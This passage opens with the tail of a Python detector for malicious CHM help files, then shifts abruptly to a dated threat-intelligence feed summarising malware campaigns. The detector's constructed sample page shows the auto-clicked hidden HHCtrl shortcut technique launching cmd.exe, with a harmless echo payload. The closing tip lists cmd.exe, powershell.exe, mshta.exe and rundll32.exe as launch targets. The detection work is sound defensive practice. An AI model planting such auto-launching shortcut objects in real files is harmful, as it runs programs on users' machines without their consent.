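HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

# Constructed sample page modelled on the technique, not copied from any real CHM:
# a 1x1 shortcut object plus a script that clicks it on load. The second object
# uses a legitimate HHCtrl command ("Related Topics") and must not be flagged.
SAMPLE_HTML = """\
<html><head><title>Help</title></head><body>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
 <PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=",cmd.exe,/c echo constructed-sample">
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<OBJECT id=rel classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
 <PARAM name="Command" value="Related Topics">
 <PARAM name="Item1" value="Overview;overview.htm">
</OBJECT>
<SCRIPT>x.Click();</SCRIPT>
<p>Welcome to the help file.</p>
</body></html>
"""


class _ObjectScanner(HTMLParser):
    """Collect every <OBJECT> with its <PARAM>s, plus all inline script text."""

    def __init__(self):
        super().__init__()
        self.objects, self.scripts = [], []
        self._cur, self._in_script = None, False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            self._cur = {"id": a.get("id", ""),
                         "classid": a.get("classid", "").lower(), "params": {}}
        elif tag == "param" and self._cur is not None:
            self._cur["params"][a.get("name", "").lower()] = a.get("value", "")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "object" and self._cur is not None:
            self.objects.append(self._cur)
            self._cur = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def find_shortcut_objects(html_text):
    """Return the HHCtrl ShortCut objects in a decompiled CHM page, each with the
    program and arguments it would launch and whether a script auto-clicks it."""
    p = _ObjectScanner()
    p.feed(html_text)
    p.close()
    # Objects whose .Click() is invoked from script fire without user interaction.
    clicked = {m.lower() for m in re.findall(r"(\w+)\.click\s*\(", "".join(p.scripts), re.I)}
    findings = []
    for obj in p.objects:
        clsid = obj["classid"].replace("clsid:", "").strip("{}")
        if clsid != HHCTRL_CLSID or obj["params"].get("command", "").lower() != "shortcut":
            continue
        # Item1 is "[window],program,parameters"; the window name is usually empty.
        parts = obj["params"].get("item1", "").split(",", 2)
        findings.append({
            "id": obj["id"],
            "program": parts[1].strip() if len(parts) > 1 else "",
            "args": parts[2].strip() if len(parts) > 2 else "",
            "auto_click": obj["id"].lower() in clicked,
        })
    return findings


def is_suspicious(html_text):
    """True when any shortcut object in the page launches a program."""
    return any(f["program"] for f in find_shortcut_objects(html_text))


if __name__ == "__main__":
    for f in find_shortcut_objects(SAMPLE_HTML):
        print(f)
    print("suspicious:", is_suspicious(SAMPLE_HTML))
```

Run it over every .htm/.html file extracted from a CHM; a shortcut object whose program is cmd.exe, powershell.exe, mshta.exe or rundll32.exe, especially one auto-clicked from script, is the pattern to escalate. Legitimate help files rarely need ShortCut at all, so treating any hit as suspicious is a reasonable default.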
2024-03-21
Sign1_malware_analysis
LOW
+
Intel Source:
Sucuri
Intel Name:
Sign1_malware_analysis
Date of Scan:
2024-03-21
Impact:
LOW
Summary:
The Sucuri article "Sign1 Malware: Analysis, Campaign History & Indicators of Compromise" covers the Sign1 malware campaign, which has affected over 39,000 websites in the past six months and is typically injected through custom HTML widgets. The malware redirects visitors to malicious sites, often tied to the VexTrio scam operation. The article traces the campaign's evolution since it was first noticed in 2023: the attackers have changed their obfuscation methods and use a timestamp trick in their URLs, and the article lists the domains they have used along with registration dates and the number of infected sites per domain. It includes a case study of a client whose infection was traced back to the campaign, a breakdown of the JavaScript that dynamically generates the redirect URLs, and the conditions that must be met for the malware to execute, including a specific cookie and a correct referrer. The author recommends securing the admin panel and using website monitoring tools, and provides indicators of compromise covering the campaign history, obfuscation techniques, and how to detect and mitigate the infection.
Source: https://blog.sucuri.net/2024/03/sign1-malware-analysis-campaign-history-indicators-of-compromise.html
2024-03-20
New_AcidPour_Data_Wiper_Targeting_Linux_x86_Network_Devices
LOW
+
Intel Source:
SentinelLabs
Intel Name:
New_AcidPour_Data_Wiper_Targeting_Linux_x86_Network_Devices
Date of Scan:
2024-03-20
Impact:
LOW
Summary:
Researchers at SentinelLabs have discovered AcidPour, a new data-wiper malware that targets Linux x86 networking and Internet of Things devices. AcidPour and AcidRain target comparable directories and device paths found in embedded Linux distributions, but the estimated overlap between their codebases is only about 30%.
Source: https://www.bleepingcomputer.com/news/security/new-acidpour-data-wiper-targets-linux-x86-network-devices/
2024-03-20
Exploits_For_TeamCity_Vulnerabilities_Lead_to_Jasmin_Ransomware
LOW
+
Intel Source:
Trend Micro
Intel Name:
Exploits_For_TeamCity_Vulnerabilities_Lead_to_Jasmin_Ransomware
Date of Scan:
2024-03-20
Impact:
LOW
Summary:
Active exploitation of vulnerabilities in TeamCity On-Premises poses a serious risk to enterprises that rely on the platform for their CI/CD pipelines. According to Trend Micro telemetry, threat actors are using these vulnerabilities to deliver ransomware, coinminers, and backdoor payloads to compromised TeamCity servers.
Source: https://www.trendmicro.com/en_us/research/24/c/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware.html
2024-03-20
Androshield_malware_targets_networks
MEDIUM
+
Intel Source:
Juniper
Intel Name:
Androshield_malware_targets_networks
Date of Scan:
2024-03-20
Impact:
MEDIUM
Summary:
The Juniper article discusses the importance of patch management and network security controls, focusing on the Androxgh0st malware, which targets Laravel applications and exploits vulnerabilities such as CVE-2017-9841 and CVE-2018-15133. It provides a technical analysis of the malware and its exploitation methods, along with defenses such as encrypting sensitive information and using multi-factor authentication, and highlights Juniper IDS and ATP Cloud as proactive defenses against Androxgh0st and similar attacks. It also discusses the abuse of SMTP, AWS, SendGrid, and Twilio credentials harvested from exposed .env files, the resulting risk of data breaches, and the need to regularly update and patch systems and enforce strong access controls.
Source: https://blogs.juniper.net/en-us/security/shielding-networks-against-androxgh0st
2024-03-19
Persistent_Cyber_Threats_Targeting_Korean_Corporations
LOW
+
Intel Source:
ASEC
Intel Name:
Persistent_Cyber_Threats_Targeting_Korean_Corporations
Date of Scan:
2024-03-19
Impact:
LOW
Summary:
AhnLab Security Intelligence Center (ASEC) has uncovered a series of ongoing attacks by the Andariel group targeting Korean companies. Notably, the group installs MeshAgent alongside other remote management tools to obtain a range of remote-control capabilities, and abuses Korean asset-management solutions to install malware such as AndarLoader and ModeLoader during lateral movement. AndarLoader is a downloader that retrieves executable data such as .NET assemblies from C&C servers; MeshAgent is a remote-management tool that enables screen control and had not previously been seen in Andariel operations; ModeLoader is JavaScript malware downloaded from an external server and executed via Mshta.
Source: https://asec.ahnlab.com/en/63192/
2024-03-19
The_GlorySprout_stealer_and_others
LOW
+
Intel Source:
Russian Panda
Intel Name:
The_GlorySprout_stealer_and_others
Date of Scan:
2024-03-19
Impact:
LOW
Summary:
A new information stealer named GlorySprout surfaced in cybercrime forums in March 2024. Technical analysis shows it is likely a clone of the older Taurus stealer, sharing code similarities but lacking some features like Anti-VM. GlorySprout is unlikely to gain popularity compared to other stealers.
Source: https://russianpanda.com/2024/03/16/The-GlorySprout-Stealer-or-a-Failed-Clone-of-Taurus-Stealer/
2024-03-19
The_Revival_of_a_Notorious_Ransomware_Threat
MEDIUM
+
Intel Source:
ASEC
Intel Name:
The_Revival_of_a_Notorious_Ransomware_Threat
Date of Scan:
2024-03-19
Impact:
MEDIUM
Summary:
AhnLab Security Intelligence Center (ASEC) has observed the resurgence of CryptoWire, a ransomware strain that wreaked havoc in 2018. Written in AutoIt and distributed primarily through phishing emails, CryptoWire features self-replication, network scanning for files to encrypt, and data-deletion measures to thwart recovery. Unlike many ransomware families, CryptoWire exposes its decryption keys, either embedded within the malware or transmitted to the threat actor's server. Users are urged to exercise caution, use anti-malware solutions, and keep systems up to date to prevent infection and data loss.
Source: https://asec.ahnlab.com/en/63200/
2024-03-19
A_new_ransomware_gang_called_Donex
LOW
+
Intel Source:
Shadowstackre
Intel Name:
A_new_ransomware_gang_called_Donex
Date of Scan:
2024-03-19
Impact:
LOW
Summary:
The ShadowStackRE analysis covers a new ransomware gang called Donex and its ransomware's pre-encryption setup, file and directory discovery, and encryption process. Setup involves creating a mutex, disabling file-system redirection, and obtaining a cryptographic context. File and directory discovery runs across multiple threads and targets specific processes for shutdown. The encryption process uses the Windows Restart Manager API to release file locks and employs Salsa20/ChaCha20 to encrypt data, with a blacklist, whitelist, and extension list in the encryptor's configuration. The analysis concludes with the cleanup phase, which clears event logs and restarts the system.
Source: https://www.shadowstackre.com/analysis/donex
2024-03-19
Analysis_of_AutoIt_Malware
LOW
+
Intel Source:
Docguard
Intel Name:
Analysis_of_AutoIt_Malware
Date of Scan:
2024-03-19
Impact:
LOW
Summary:
This article provides a comprehensive analysis of LNK-based malware, covering static analysis and AutoIt deobfuscation. It examines the important fields of the LNK file and identifies a malicious command that downloads and executes an HTA file from a remote server. The HTA file, downloaded and analyzed manually, uses forfiles.exe and PowerShell. The analysis also uncovers an embedded zip file, which is extracted and examined; a script is used to parse the AutoIt variables and strip the unnecessary ones, and a list of IOCs is provided for this malware.
Source: https://www.docguard.io/analysis-of-lnk-based-obfuscated-autoit-malware/
2024-03-19
A_New_Phishing_Attack_That_Deploys_NetSupport_RAT
LOW
+
Intel Source:
Perception Point
Intel Name:
A_New_Phishing_Attack_That_Deploys_NetSupport_RAT
Date of Scan:
2024-03-19
Impact:
LOW
Summary:
Perception Point researchers have uncovered a new spear-phishing campaign, dubbed Operation PhantomBlu, targeting US organizations to install the NetSupport RAT remote access trojan. By using OLE (Object Linking and Embedding) template manipulation to execute malicious code while evading detection, PhantomBlu departs from the usual NetSupport RAT delivery methods.
Source: https://perception-point.io/blog/operation-phantomblu-new-and-evasive-method-delivers-netsupport-rat/
2024-03-19
RA_World_Ransomware_continued_activity
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
RA_World_Ransomware_continued_activity
Date of Scan:
2024-03-19
Impact:
MEDIUM
Summary:
The blog provides an overview of the RA World ransomware, which exfiltrates data and encrypts files before demanding a ransom both for decryption and for not leaking the stolen files. The ransomware disables backups and deletes shadow copies to prevent recovery, appends the .RAWLD extension to encrypted files, and drops a ransom note with contact information. The group operates Tor and non-Tor sites to publish stolen data. The blog covers infection vectors, victims, attack methods, protections, and mitigations.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-ra-world
2024-03-18
CryptoWire_ransomware_distribution
MEDIUM
+
Intel Source:
ASEC
Intel Name:
CryptoWire_ransomware_distribution
Date of Scan:
2024-03-18
Impact:
MEDIUM
Summary:
This report analyzes the CryptoWire ransomware, an open-source malware initially spread in 2018 via phishing emails. The malware is written in AutoIt and contains its decryption keys within the code, allowing files to be decrypted without payment. It encrypts files and leaves a ransom note demanding payment, but because the keys are present, paying is unnecessary.
Source: https://asec.ahnlab.com/ko/62868/
2024-03-18
Open_Directory_Exposes_Phishing_Campaign_Targeting_Google_And_Naver_Credentials
MEDIUM
+
Intel Source:
Hunt.IO
Intel Name:
Open_Directory_Exposes_Phishing_Campaign_Targeting_Google_And_Naver_Credentials
Date of Scan:
2024-03-18
Impact:
MEDIUM
Summary:
Hunt.IO researchers have observed an ongoing phishing campaign by a possible North Korean threat actor aimed at stealing login credentials for Google and Naver. Besides numerous fake Google and Naver pages, the open directory that led to the finding also contains a sample of the open-source malware Xeno-RAT and KakaoTalk conversation transcripts between unidentified people discussing cryptocurrency trading.
Source: https://hunt.io/blog/open-directory-exposes-phishing-campaign-targeting-google-and-naver-credentials?utm_source=substack&utm_medium=email
2024-03-18
ScamClub_Malicious_VAST_Attack
LOW
+
Intel Source:
Geoedge
Intel Name:
ScamClub_Malicious_VAST_Attack
Date of Scan:
2024-03-18
Impact:
LOW
Summary:
A recent report details how a threat actor known as ScamClub has shifted to using video malvertising and VAST ads to distribute financial scams. The report analyzes ScamClub's tactics, which involve exploiting the VAST protocol to embed malicious code in video ads that fingerprint users and redirect them to scam pages. The report highlights how ScamClub has infiltrated numerous ad platforms to reach a broad audience, with a focus on mobile users. It outlines the technical details of the attack flow, from crafting the malicious script to employing obfuscation techniques and evading detection. The report underscores the need for constant scanning of video assets to safeguard inventory and protect audiences.
Source: https://www.geoedge.com/decoding-scamclubs-malicious-vast-attack
2024-03-18
Examining_Latest_DEEP_GOSU_Attack_Campaign
MEDIUM
+
Intel Source:
Securonix Threat Labs
Intel Name:
Examining_Latest_DEEP_GOSU_Attack_Campaign
Date of Scan:
2024-03-18
Impact:
MEDIUM
Summary:
Securonix researchers have been tracking a new campaign, identified as DEEP#GOSU, that appears to be connected to the Kimsuky group. It includes both recycled and newly created code and stagers. Although the Kimsuky group has previously targeted South Korean victims, the observed tradecraft shows that the group has switched to a new script-based attack chain that uses numerous PowerShell and VBScript stagers to covertly infect systems. Scripts deployed later in the chain allow the attackers to monitor keystrokes, the clipboard, and other session activity.
Source: https://www.securonix.com/blog/securonix-threat-research-security-advisory-new-deepgosu-attack-campaign/
2024-03-18
Hackers_From_APT28_Targeting_Europe_America_Asia_in_Widespread_Phishing_Scheme
MEDIUM
+
Intel Source:
IBM X-Force
Intel Name:
Hackers_From_APT28_Targeting_Europe_America_Asia_in_Widespread_Phishing_Scheme
Date of Scan:
2024-03-18
Impact:
MEDIUM
Summary:
IBM X-Force researchers have discovered that the threat actor APT28, which is associated with Russia, is involved in several active phishing attacks. These campaigns use lure documents that mimic government and non-governmental organizations (NGOs) throughout North and South America, Europe, the South Caucasus, Central Asia, and Asia. In addition to potentially actor-generated documents pertaining to finance, key infrastructure, executive engagements, cyber security, maritime security, healthcare, business, and defense industrial production, the unearthed lures comprise a combination of internal and publicly available documents.
Source: https://securityintelligence.com/x-force/itg05-leverages-malware-arsenal/
2024-03-18
Malicious_Attacks_on_Global_Government_Institutions
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
Malicious_Attacks_on_Global_Government_Institutions
Date of Scan:
2024-03-18
Impact:
MEDIUM
Summary:
Trend Micro researchers have found a malicious actor targeting global government institutions. Exploiting compromised government infrastructure, the group employs two distinct malware families observed in Earth Krahang's attacks. Their analysis also highlights the broad range of the group's targets and malicious activities, gleaned from telemetry data and exposed server files.
Source: https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html
2024-03-18
ObserverStealer_Story_Continues_with_AsukaStealer
LOW
+
Intel Source:
Any.Run
Intel Name:
ObserverStealer_Story_Continues_with_AsukaStealer
Date of Scan:
2024-03-18
Impact:
LOW
Summary:
AsukaStealer and ObserverStealer are fundamentally similar in that they both use XOR encryption and C2 communication. AsukaStealer nevertheless distinguishes itself by forgoing external DLL dependencies for data parsing and decryption in favor of server-side processing, which increases stealth and reduces its footprint on the host. The developers' intention to improve the stealer in response to prior criticism and unfavorable user feedback is thought to be the driving force behind the rebranding of ObserverStealer under a different moniker.
Source: https://any.run/cybersecurity-blog/asukastealer-malware-analysis/#appendix-1-iocs-7288
2024-03-18
Hackers_Find_Vulnerable_Networks_by_Using_the_Aiohttp_Bug
LOW
+
Intel Source:
Cyble
Intel Name:
Hackers_Find_Vulnerable_Networks_by_Using_the_Aiohttp_Bug
Date of Scan:
2024-03-18
Impact:
LOW
Summary:
Researchers at Cyble have discovered that the ransomware actor "ShadowSyndicate" has been seen scanning for servers that could be affected by CVE-2024-23334, a directory traversal vulnerability in the aiohttp Python module. aiohttp is an open-source toolkit designed to handle massively concurrent HTTP requests without conventional thread-based networking. It is built on top of Python's asyncio asynchronous I/O framework.
Source: https://cyble.com/blog/cgsi-probes-shadowsyndicate-groups-possible-exploitation-of-aiohttp-vulnerability-cve-2024-23334/
2024-03-18
Mac_malware_analysis_using_osquery
LOW
+
Intel Source:
Uptycs
Intel Name:
Mac_malware_analysis_using_osquery
Date of Scan:
2024-03-18
Impact:
LOW
Summary:
This article discusses the use of osquery, an operating system instrumentation framework, for analyzing malware on macOS systems. It describes how malware can use commands like chown and chmod to gain control and persistence on a system. The article also provides a detailed overview of using osquery for malware analysis, including a comparison with sandboxing solutions and a step-by-step guide for analyzing a specific malware, OSX/Dummy. It concludes by highlighting the benefits of using osquery for dynamic malware analysis on macOS and Linux systems.
Source: https://www.uptycs.com/blog/malware-analysis-using-osquery
2024-03-18
An_Intimidating_Azorult_Campaign_Operated_Via_Google_Sites
LOW
+
Intel Source:
Netskope
Intel Name:
An_Intimidating_Azorult_Campaign_Operated_Via_Google_Sites
Date of Scan:
2024-03-18
Impact:
LOW
Summary:
Researchers at Netskope have observed an evasive Azorult campaign that uses a variety of defense evasion techniques, from delivery to execution, to steal confidential information without drawing defenders' attention. This infostealer was initially identified in 2016 and is capable of stealing private data such as browser history, crypto wallet data, and user credentials.
Source: https://www.netskope.com/blog/from-delivery-to-execution-an-evasive-azorult-campaign-smuggled-through-google-sites
2024-03-15
GhostSec_profile
LOW
+
Intel Source:
SOCRadar
Intel Name:
GhostSec_profile
Date of Scan:
2024-03-15
Impact:
LOW
Summary:
GhostSec’s primary target is online terrorism and violent extremism. GhostSec quickly gained recognition for its approach to confronting extremist groups online. The group even alleges that some of its members were employed by government agencies during an alleged meeting with the US government in those years. GhostSec’s initial goal revolved around the somewhat vague aim of disrupting the online presence and communication of terrorist organizations like ISIS (Islamic State of Iraq and Syria) and Al-Qaeda. However, while the group initially appeared neutral in the Israel-Hamas conflict, they later declared their support for Palestine against what they perceived as Israel’s war crimes.
Source: https://socradar.io/dark-web-profile-ghostsec/
2024-03-15
A_new_stealer_name_Xehook
MEDIUM
+
Intel Source:
Cyble
Intel Name:
A_new_stealer_name_Xehook
Date of Scan:
2024-03-15
Impact:
MEDIUM
Summary:
Cyble analysts discovered a new stealer named Xehook in January 2024. Xehook Stealer targets the Windows operating system and is written in .NET. The threat actor claims that this stealer offers dynamic data collection from all Chromium- and Gecko-based browsers, supporting over 110 cryptocurrencies and 2FA extensions.
Source: https://cyble.com/blog/xehook-stealer-evolution-of-cinoshis-project-targeting-over-100-cryptocurrencies-and-2fa-extensions/
2024-03-15
An_increase_in_tax_themed_phishing_emails
LOW
+
Intel Source:
Esentire
Intel Name:
An_increase_in_tax_themed_phishing_emails
Date of Scan:
2024-03-15
Impact:
LOW
Summary:
This month, eSentire has seen a spike in malware delivered through tax-themed phishing emails. Threat Actors are trying to exploit the tax-related communications lures to trick individuals into opening malicious email links, leading to malware infections. The observed phishing campaigns utilize tax-themed lures, including tax documents, tax returns, and IRS letters. These emails often appear to be sent from legitimate tax authorities or financial institutions and include malicious links leading to malware payloads hosted on attacker-controlled infrastructure.
Source: https://www.esentire.com/security-advisories/increase-in-tax-themed-email-lure
2024-03-15
A_Fake_Forum_Post_Contamining_GootLoader_Infection
LOW
+
Intel Source:
PaloAlto
Intel Name:
A_Fake_Forum_Post_Contamining_GootLoader_Infection
Date of Scan:
2024-03-15
Impact:
LOW
Summary:
Researchers at Palo Alto have discovered that another fake forum post links to the GootLoader malware. Since at least 2021, this distribution strategy has shown remarkable consistency.
Source: https://www.linkedin.com/posts/unit42_gootloader-timelythreatintel-unit42threatintel-ugcPost-7174049165306527746-aeLl?utm_source=share&utm_medium=member_ios
2024-03-15
BunnyLoader_3_analysis
MEDIUM
+
Intel Source:
Palo Alto
Intel Name:
BunnyLoader_3_analysis
Date of Scan:
2024-03-15
Impact:
MEDIUM
Summary:
Palo Alto Networks Unit 42 shared their analysis of the newly released BunnyLoader 3.0, its infrastructure, and an overview of its capabilities. BunnyLoader is a constantly evolving malware with the capability to steal information, credentials, and cryptocurrency, as well as deliver additional malware to its victims. The threat actor behind this malware is known as “Player” or “Player_Bunny.” The buyer determines what malware BunnyLoader delivers. The author of this malware prohibits its use against Russian systems.
Source: https://unit42.paloaltonetworks.com/analysis-of-bunnyloader-malware/
2024-03-15
DarkGate_Operators_Exploit_Microsoft_Windows_SmartScreen_Bypass
MEDIUM
+
Intel Source:
Trendmicro
Intel Name:
DarkGate_Operators_Exploit_Microsoft_Windows_SmartScreen_Bypass
Date of Scan:
2024-03-15
Impact:
MEDIUM
Summary:
The Zero Day Initiative tracked a DarkGate campaign observed in January 2024 in which DarkGate operators exploited CVE-2024-21412, and linked it to the Water Hydra APT zero-day analysis.
Source: https://www.trendmicro.com/en_us/research/24/c/cve-2024-21412--darkgate-operators-exploit-microsoft-windows-sma.html
2024-03-15
DocLink_Defender_prevention_technology
LOW
+
Intel Source:
Checkpoint
Intel Name:
DocLink_Defender_prevention_technology
Date of Scan:
2024-03-15
Impact:
LOW
Summary:
DocLink Defender leverages the latest in analytical technology to intercept and neutralize malicious documents instantly.
Source: https://blog.checkpoint.com/security/shield-your-documents-introducing-doclink-defender-for-real-time-malware-blockade/
2024-03-15
The_ActiveMQ_Vulnerability_Is_Being_Exploited_by_Messengers
LOW
+
Intel Source:
Cybereason
Intel Name:
The_ActiveMQ_Vulnerability_Is_Being_Exploited_by_Messengers
Date of Scan:
2024-03-15
Impact:
LOW
Summary:
Researchers from Cybereason have investigated an incident on a Linux server where malicious shell (bash) executions occurred via a Java process that was running Apache ActiveMQ. ActiveMQ is an open-source message broker used to facilitate communication across disparate servers that may run different operating systems or be written in different languages.
Source: https://www.cybereason.com/blog/beware-of-the-messengers-exploiting-activemq-vulnerability
2024-03-15
Roblox_Users_Targeted_with_Tweaks_Malware
LOW
+
Intel Source:
Zscaler
Intel Name:
Roblox_Users_Targeted_with_Tweaks_Malware
Date of Scan:
2024-03-15
Impact:
LOW
Summary:
Zscaler’s threat researchers observed a new attack campaign spreading an infostealer called Tweaks that targets Roblox users. Attackers are abusing platforms like YouTube and Discord to distribute Tweaks to Roblox users, evading web filter block lists that typically block known malicious servers. Attackers share malicious files disguised as Frames Per Second (FPS) optimization packages with users, who in turn infect their systems with the Tweaks malware.
Source: https://www.zscaler.com/blogs/security-research/tweaks-stealer-targets-roblox-users-through-youtube-and-discord
2024-03-15
The_Chinese_users_targeted_by_infected_text_editors
LOW
+
Intel Source:
Securelist
Intel Name:
The_Chinese_users_targeted_by_infected_text_editors
Date of Scan:
2024-03-15
Impact:
LOW
Summary:
Securelist analysts discovered two related cases where modified versions of popular text editors were distributed in this system: in the first case, the malicious resource appeared in the advertisement section; in the second case, at the top of the search results.
Source: https://securelist.com/trojanized-text-editor-apps/112167/
2024-03-15
Online_Scam_campaign
LOW
+
Intel Source:
F1tym1
Intel Name:
Online_Scam_campaign
Date of Scan:
2024-03-15
Impact:
LOW
Summary:
Scammers aim for mobile phones because they are the most widespread, most utilized devices. They use subterfuge and scams to steal our money, information, and permissions.
Source: https://f1tym1.com/2024/03/14/online-scam-scams-encountered-on-my-phone/
2024-03-15
Exdefacer_Turns_Seller_of_Discord_Stealer_aka_Nikki_Stealer
LOW
+
Intel Source:
CYFIRMA Research
Intel Name:
Exdefacer_Turns_Seller_of_Discord_Stealer_aka_Nikki_Stealer
Date of Scan:
2024-03-15
Impact:
LOW
Summary:
Researchers from CYFIRMA have discovered that a person who was formerly well-known for vandalizing websites has switched to offering a Discord stealer created using the Electron framework, named Nikki Stealer. The latest developments in Nikki Stealer v9 demonstrate how quickly this tool is evolving. Analysis of the Nikki Stealer Discord server's conversation logs reveals that users are complaining about the device's poor detection rate. Additionally, the stealer's developer can be seen talking candidly about drug use in the conversation. Remarkable parallels have been noted between Fewer and Nikki Stealer.
Source: https://media.licdn.com/dms/document/media/D561FAQEHMA1974p3pA/feedshare-document-pdf-analyzed/0/1710500504964?e=1711584000&v=beta&t=eC173BZYgGbUF25DLnBY-AgSTtSwfsTbN2aFuO9xOgE
2024-03-15
Threat_actors_leverage_document_for_credential_and_session_token_theft
LOW
+
Intel Source:
Cisco Talos
Intel Name:
Threat_actors_leverage_document_for_credential_and_session_token_theft
Date of Scan:
2024-03-15
Impact:
LOW
Summary:
Cisco Talos Incident Response (Talos IR) has observed the ongoing use of legitimate digital document publishing (DDP) sites for phishing, credential theft, and session token theft during recent incident response and threat intelligence engagements.
Source: https://blog.talosintelligence.com/threat-actors-leveraging-document-publishing-sites/
2024-03-13
Multiple_Ongoing_Malvertising_Activities_Used_to_Distribute_FakeBat
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Multiple_Ongoing_Malvertising_Activities_Used_to_Distribute_FakeBat
Date of Scan:
2024-03-13
Impact:
LOW
Summary:
FakeBat malvertising campaigns were using two kinds of ad URLs. They were misusing URL/analytics shorteners, which are well suited to cloaking, as seen in past malvertising efforts. This technique gives a threat actor the ability to select a "good" or "bad" destination URL according to their own predetermined criteria (such as the IP address, user agent, and time of day).
Source: https://www.malwarebytes.com/blog/threat-intelligence/2024/03/fakebat-delivered-via-several-active-malvertising-campaigns
2024-03-13
Malicious_Advertising_Using_Search_Engines
LOW
+
Intel Source:
Securelist
Intel Name:
Malicious_Advertising_Using_Search_Engines
Date of Scan:
2024-03-13
Impact:
LOW
Summary:
Researchers at Securelist have noticed a rise in the quantity of malicious operations that disseminate and distribute malware via Google Advertising. Rhadamanthys and RedLine, two distinct stealers, were misusing the search engine promotion scheme to infect victims' computers with malicious payloads. They appear to employ the same method of imitating a website connected to popular programs like Blender 3D and Notepad++.
Source: https://securelist.com/malvertising-through-search-engines/108996/
2024-03-13
Attackers_Using_GitHub_and_AWS_to_Spread_RATs_Through_Phishing_Campaigns
LOW
+
Intel Source:
Fortinet
Intel Name:
Attackers_Using_GitHub_and_AWS_to_Spread_RATs_Through_Phishing_Campaigns
Date of Scan:
2024-03-13
Impact:
LOW
Summary:
A recent phishing effort was discovered in which attackers exploit publicly accessible platforms like GitHub and Amazon web servers to store malware, which is then delivered via email to initiate an attack campaign and take over the newly compromised systems. According to FortiGuard Labs, the email tricks recipients into opening a dangerous, high-severity Java downloader that attempts to deploy the well-known STRRAT RAT and a brand-new VCURMS remote access trojan (RAT). Every platform that has Java installed is susceptible, and it can affect any kind of business.
Source: https://www.fortinet.com/blog/threat-research/vcurms-a-simple-and-functional-weapon
2024-03-13
RisePro_Stealer_Is_Aiming_at_Github_Users
MEDIUM
+
Intel Source:
G DATA
Intel Name:
RisePro_Stealer_Is_Aiming_at_Github_Users
Date of Scan:
2024-03-13
Impact:
MEDIUM
Summary:
Researchers from G DATA Cyber Defense have found at least 13 GitHub repositories that are part of a RisePro stealer campaign the threat actors have dubbed "gitgub." The repositories have a similar appearance and offer free cracked software in a README.md file. On GitHub, green and red circles are frequently used to indicate the status of automated builds. The gitgub threat actors inserted four green Unicode circles into their README.md file, which appear to show a status along with the current date and give the impression of validity and recency.
Source: https://www.gdatasoftware.com/blog/2024/03/37885-risepro-stealer-campaign-github
2024-03-13
Decoding_Malicious_Scripts_Using_ChatGPT
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Decoding_Malicious_Scripts_Using_ChatGPT
Date of Scan:
2024-03-13
Impact:
LOW
Summary:
Researchers from ISC SANS have discovered a malicious Python script with a low VirusTotal score of 2/61. By the time they examined it, it had been obfuscated: all of the interesting strings were compressed, Base64-encoded, and hex-encoded.
Source: https://isc.sans.edu/diary/rss/30740
2024-03-12
SnakeKeylogger_loader_technics_and_tactics
MEDIUM
+
Intel Source:
Splunk
Intel Name:
SnakeKeylogger_loader_technics_and_tactics
Date of Scan:
2024-03-12
Impact:
MEDIUM
Summary:
The Splunk Threat Research Team shared in their blog deep insights and details on SnakeKeylogger's loader and its tactics, techniques, and procedures, to help security analysts and blue teamers recognize and defend against this suspicious activity.
Source: https://www.splunk.com/en_us/blog/security/under-the-hood-of-snakekeylogger-analyzing-its-loader-and-its-tactics-techniques-and-procedures.html
2024-03-12
A_Dark_Web_Profile_of_Meow_Ransomware
LOW
+
Intel Source:
SOC Radar
Intel Name:
A_Dark_Web_Profile_of_Meow_Ransomware
Date of Scan:
2024-03-12
Impact:
LOW
Summary:
Four ransomware strains descended from Conti's leaked ransomware code were found in late 2022. The Meow ransomware was one of them. This crypto-ransomware was detected operating between the end of August and the first part of September 2022, and it continued to do so until February 2023. It stopped operating in March 2023 after a free decryptor for the Meow ransomware was made available. There is still an active group called Meow that entered 2024 rather quickly and has already claimed nine victims. This gang appears to use the RaaS model; in March 2024 alone, three victims were reported, and the institutions they target are not insignificant ones.
Source: https://socradar.io/dark-web-profile-meow-ransomware/
2024-03-12
Attacks_on_Crypto_Wallet_Recovery_Passwords_by_Malicious_PyPI_Packages
LOW
+
Intel Source:
Reversing Labs
Intel Name:
Attacks_on_Crypto_Wallet_Recovery_Passwords_by_Malicious_PyPI_Packages
Date of Scan:
2024-03-12
Impact:
LOW
Summary:
Researchers at ReversingLabs have discovered a brand-new harmful campaign that consists of seven distinct open-source packages on the Python Package Index (PyPI) with 19 versions, the oldest of which was released in December 2022. The campaign aims to steal mnemonic phrases that are used to recover crypto wallets that have been lost or destroyed.
Source: https://www.reversinglabs.com/blog/bipclip-malicious-pypi-packages-target-crypto-wallet-recovery-passwords
2024-03-12
Operators_Adapt_to_Disruption_as_Ransomware_Attacks_Rise
LOW
+
Intel Source:
Symantec
Intel Name:
Operators_Adapt_to_Disruption_as_Ransomware_Attacks_Rise
Date of Scan:
2024-03-12
Impact:
LOW
Summary:
Even though the number of attacks that ransomware operators claim to have carried out dropped by little more than 20% in the fourth quarter of 2023, ransomware activity is still on the rise. Attackers have continuously improved their strategies, shown that they can react quickly to disruptions, and discovered new means of infecting victims.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-attacks-exploits
2024-03-12
Infostealer_Posing_as_Installer_For_Adobe_Reader
LOW
+
Intel Source:
ASEC
Intel Name:
Infostealer_Posing_as_Installer_For_Adobe_Reader
Date of Scan:
2024-03-12
Impact:
LOW
Summary:
Researchers from ASEC have found that an infostealer posing as the Adobe Reader installer is being distributed. The threat actor distributes the file in PDF format, prompting users to download and execute it.
Source: https://asec.ahnlab.com/en/62853/
2024-03-11
A_New_Phishing_Attack_Targeting_Dropbox
LOW
+
